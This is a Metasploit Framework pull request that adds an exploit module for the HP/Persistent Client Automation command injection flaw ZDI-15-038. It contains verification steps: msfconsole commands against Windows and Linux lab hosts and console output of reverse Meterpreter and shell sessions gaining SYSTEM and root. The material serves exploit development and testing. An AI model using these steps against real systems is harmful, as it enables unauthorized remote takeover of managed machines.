
Add module for ZDI-15-038, Persistent (HP) Client Automation Command Injection RCE #4804

Merged
merged 2 commits into from Feb 20, 2015

jvazquez-r7
Contributor

Tested on:

  • Windows 7 SP1 (32-bit) with HPCA agent 9.00 for Windows
  • CentOS 5 (64-bit) with HPCA agent 9.00 for Linux

Verification

  • Download HPCA 9.00 Enterprise trial from http://www8.hp.com/us/en/software-solutions/client-automation-management-software/
  • Review the installation documentation available in the Doc folder of the trial ISO (I really cannot explain the installation steps better than the official documentation does)
  • First of all, install an HPCA Core Server on a Windows 2003 SP2 server (maybe you can just install the agents; I've not tried installing them without a Core server)

Exploit Windows target

  • Install an HPCA Windows Agent on a Windows 7 SP1 machine
  • Start the console and use the module from this pull request
msf > use exploit/multi/misc/persistent_hpca_radexec_exec
msf exploit(persistent_hpca_radexec_exec) >
  • Set the target and options
msf exploit(persistent_hpca_radexec_exec) > set TARGET 1
TARGET => 1
msf exploit(persistent_hpca_radexec_exec) > set RHOST 172.16.158.132
RHOST => 172.16.158.132
  • Check, and verify that it finds the service
msf exploit(persistent_hpca_radexec_exec) > check
[*] 172.16.158.132:3465 - The target service is running, but could not be validated.
  • Set the payload, exploit, and verify that you get a session
msf exploit(persistent_hpca_radexec_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Exploiting Windows target...
[*] Command Stager progress -   0.26% done (289/109237 bytes)
[*] Command Stager progress -   0.53% done (578/109237 bytes)
[*] Command Stager progress -   0.79% done (867/109237 bytes)
[*] Command Stager progress -   1.06% done (1156/109237 bytes)
[*] Command Stager progress -   1.32% done (1445/109237 bytes)
[*] Command Stager progress -   1.59% done (1734/109237 bytes)
[*] Command Stager progress -   1.85% done (2023/109237 bytes)

[*] Command Stager progress -  99.68% done (108882/109237 bytes)
[*] Command Stager progress -  99.93% done (109158/109237 bytes)
[*] Command Stager progress - 100.00% done (109237/109237 bytes)
[*] Sending stage (770048 bytes) to 172.16.158.132
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.132:49166) at 2015-02-20 01:01:46 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

Exploit linux target

  • Install an HPCA Linux Agent on a CentOS 5 (64-bit) machine
  • Start the console and use the module from this pull request
msf > use exploit/multi/misc/persistent_hpca_radexec_exec
msf exploit(persistent_hpca_radexec_exec) >
  • Set the target and options
msf exploit(persistent_hpca_radexec_exec) > set target 0
target => 0
msf exploit(persistent_hpca_radexec_exec) > set rhost 172.16.158.133
rhost => 172.16.158.133
  • Check, and verify that it finds the service
msf exploit(persistent_hpca_radexec_exec) > check
[*] 172.16.158.133:3465 - The target service is running, but could not be validated.
  • Set the payload, exploit, and verify that you get a session
msf exploit(persistent_hpca_radexec_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(persistent_hpca_radexec_exec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(persistent_hpca_radexec_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] Exploiting Linux target...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8UJxoZHHsO08NDtE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8UJxoZHHsO08NDtE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (172.16.158.1:4444 -> 172.16.158.133:41659) at 2015-02-20 01:06:25 -0600

id
uid=0(root) gid=0(root)
^C
Abort session 3? [y/N]  y

[*] 172.16.158.133 - Command shell session 3 closed.  Reason: User exit

@wchen-r7 wchen-r7 self-assigned this Feb 20, 2015
@wchen-r7 wchen-r7 merged commit 1633a6d into rapid7:master Feb 20, 2015
todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Feb 24, 2015